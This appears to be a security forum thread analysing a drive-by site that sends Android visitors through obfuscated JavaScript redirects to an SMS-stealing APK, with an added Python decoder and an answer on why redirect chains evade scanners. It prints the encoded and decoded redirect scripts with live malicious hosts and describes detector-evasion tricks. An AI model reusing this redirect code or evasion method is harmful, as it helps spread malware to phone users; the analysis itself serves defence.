
Recently I found a new kind of malware site: it only attacks Android phones and looks normal from a PC. And it successfully avoided every malware detector.

To see how it works, take a look at the site: www.mfflag.com

At the beginning of the HTML, it has a script:

<script>
<!--
document.write(unescape("%3Cscript%20type%3D%22text/javascript%22%3E%0Avar%20browser%20%3D%20%7B%0Aversions%3A%20function%20%28%29%20%7B%0Avar%20u%20%3D%20navigator.userAgent%2C%20app%20%3D%20navigator.appVersion%3B%0Areturn%20%7B%20//%u79FB%u52A8%u7EC8%u7AEF%u6D4F%u89C8%u5668%u7248%u672C%u4FE1%u606F%20%0Aios%3A%20%21%21u.match%28/%5C%28i%5B%5E%3B%5D+%3B%28%20U%3B%29%3F%20CPU.+Mac%20OS%20X/%29%2C%20//ios%u7EC8%u7AEF%20%0Aandroid%3A%20u.indexOf%28%27Android%27%29%20%3E%20-1%20%7C%7C%20u.indexOf%28%27Linux%27%29%20%3E%20-1%2C%20//android%u7EC8%u7AEF%u6216uc%u6D4F%u89C8%u5668%20%0AiPhone%3A%20u.indexOf%28%27iPhone%27%29%20%3E%20-1%2C%20//%u662F%u5426%u4E3AiPhone%u6216%u8005QQHD%u6D4F%u89C8%u5668%20%0AiPad%3A%20u.indexOf%28%27iPad%27%29%20%3E%20-1%2C%20//%u662F%u5426iPad%20%0A%7D%3B%0A%7D%28%29%2C%0A%7D%0Aif%20%28browser.versions.iPhone%20%7C%7C%20browser.versions.iPad%20%7C%7C%20browser.versions.ios%29%20%7B%0Awindow.location.href%20%3D%20%22http%3A//9ifmz.polishingmedia.cn%3A9000/668899.html%22%3B%0A%7D%0Aif%20%28browser.versions.android%29%20%7B%0Awindow.location.href%20%3D%20%22http%3A//zm87i.gaoxiaopic.cn%3A8301/668899.zip%22%3B%0A%7D%0A%3C/script%3E"));
//-->
</script>

It is URL-encoded, but after decoding it looks like:

<script type="text/javascript">
var browser = {
    versions: function () {
        var u = navigator.userAgent, app = navigator.appVersion;
        return { // mobile browser version info
            ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), // iOS
            android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, // Android or UC browser
            iPhone: u.indexOf('iPhone') > -1, // iPhone or QQHD browser
            iPad: u.indexOf('iPad') > -1, // iPad
        };
    }(),
}
if (browser.versions.iPhone || browser.versions.iPad || browser.versions.ios) {
    window.location.href = "http://9ifmz.polishingmedia.cn:9000/668899.html";
}
if (browser.versions.android) {
    window.location.href = "http://zm87i.gaoxiaopic.cn:8301/668899.zip";
}
</script>

So basically the first jump is to download a zip for Android, and that .zip link is only accessible from some mobile browsers. After downloading and uncompressing, it is also JavaScript:

<html><head><title>loading</title><script>var d = [119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,32,61,32,39,104,116,116,112,58,47,47,100,115,97,101,119,113,46,110,118,114,101,110,97,105,46,99,99,58,56,51,51,48,47,54,54,56,56,57,57,95,99,51,100,52,54,57,48,50,51,48,56,54,97,49,55,55,56,100,56,55,50,98,101,52,49,97,99,54,52,50,51,57,46,104,116,109,108,39];  var u = '';  for(var i = 0; i < d.length; i++){          u += String.fromCharCode(d[i]);      };      eval(u);      </script></head></html>

This is yet another jump after decoding the var, and then at that place it tries to install an .apk file on the phone and shows some porn videos.

The apk is a virus and will read every one of your messages and send them to an email address the attacker uses.

The question is: why not jump directly? Why does this kind of attack use multiple jumps to the final site?

And second, why do all malware detectors fail to detect such threats? Is it because the script only targets mobile devices and the detector doesn't use that agent tag?

bugs king

Top major security check sites, such as Google Safe Browsing, failed to detect this kind of obfuscated script and malware, so why? – bugs king Feb 23 '18 at 05:35
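An added example (not from the question or from the site under discussion) of how a defender can statically peel the two obfuscation layers quoted above, JavaScript unescape() encoding with %uXXXX sequences and a String.fromCharCode array fed to eval(), to recover the redirect targets without executing any script. The sample inputs are constructed here and use placeholder hosts.

```python
import re

# Layer 1 on the page: document.write(unescape("%3Cscript...%u79FB...")).
# JavaScript's unescape() understands both %XX and %uXXXX; Python's urllib
# does not know %uXXXX, so decode both forms by hand, in a single pass.
def js_unescape(s):
    return re.sub(r'%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})',
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

# Layer 2 on the page: var d = [119,105,...]; eval(String.fromCharCode(...)).
# Rebuild every bare integer array as text instead of letting eval() run it.
def decode_charcode_array(src):
    arrays = re.findall(r'\[\s*((?:\d+\s*,\s*)*\d+)\s*\]', src)
    return [''.join(chr(int(n)) for n in a.split(',')) for a in arrays]

URL_RE = re.compile(r"https?://[^\s'\"<>]+")

def unwrap_stages(html, max_depth=5):
    """Peel unescape() and charcode layers until nothing decodes further,
    collecting the absolute URLs each layer redirects to (in order)."""
    targets, layer = [], html
    for _ in range(max_depth):          # bound the loop; chains nest a few times
        targets += URL_RE.findall(layer)
        m = re.search(r'unescape\("([^"]+)"\)', layer)
        if m:
            layer = js_unescape(m.group(1))
            continue
        decoded = decode_charcode_array(layer)
        if decoded:
            layer = '\n'.join(decoded)
            continue
        break
    return list(dict.fromkeys(targets))  # de-duplicate, keep first-seen order

# Constructed samples shaped like the two layers quoted in the question;
# the hosts are placeholders, not the ones on the page.
STAGE1 = ('<script>document.write(unescape("%3Cscript%3E%0A//%u79FB%u52A8%0A'
          'if%20%28navigator.userAgent.indexOf%28%27Android%27%29%20%3E%20-1%29%20'
          'window.location.href%20%3D%20%22http%3A//drop.example.net%3A8301/'
          'stage2.zip%22%3B%3C/script%3E"));</script>')
STAGE2_TEXT = "window.location = 'http://final.example.net:8330/payload.html'"
STAGE2 = ('<html><head><script>var d = ['
          + ','.join(str(ord(c)) for c in STAGE2_TEXT)
          + "]; var u = ''; for(var i = 0; i < d.length; i++){"
          "u += String.fromCharCode(d[i]);} eval(u);</script></head></html>")

if __name__ == '__main__':
    for name, blob in (('stage 1', STAGE1), ('stage 2', STAGE2)):
        print(name, '->', unwrap_stages(blob))
```

Because nothing is evaluated, the same functions can run inside a scanner that never has to follow the redirect chain with a live mobile user agent.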

1 Answer

The question is: why not jump directly? Why does this kind of attack use multiple jumps to the final site?

And second, why do all malware detectors fail to detect such threats? Is it because the script only targets mobile devices and the detector doesn't use that agent tag?

Using multiple redirects makes the manual analysis process tedious; on the other hand, malware detectors and malicious-activity detectors in most cases do not analyze them, because multiple redirects make their server or local engine busy (they must follow the redirects to arrive at the final destination).

Malware authors use some sleep functions or huge mathematical calculations (because some malware detectors' algorithms detect simple sleep or wait functions and neutralize these tricks) to add random gaps between redirects and make the redirects a time-consuming process.

Most malware detectors do not scan further redirects after (n) redirects have occurred, because the self-guard algorithms and mechanisms think the time-consuming activity is trying to make the engine busy or stop it by a stack overflow, etc. Of course this trick is old, but it still works!

This is an unlimited game: malware authors use new tricks and get smarter daily; on the other hand, malware detectors learn these tricks and improve their algorithms and AI engines and try to prevent attacks.

Mojtaba Tajik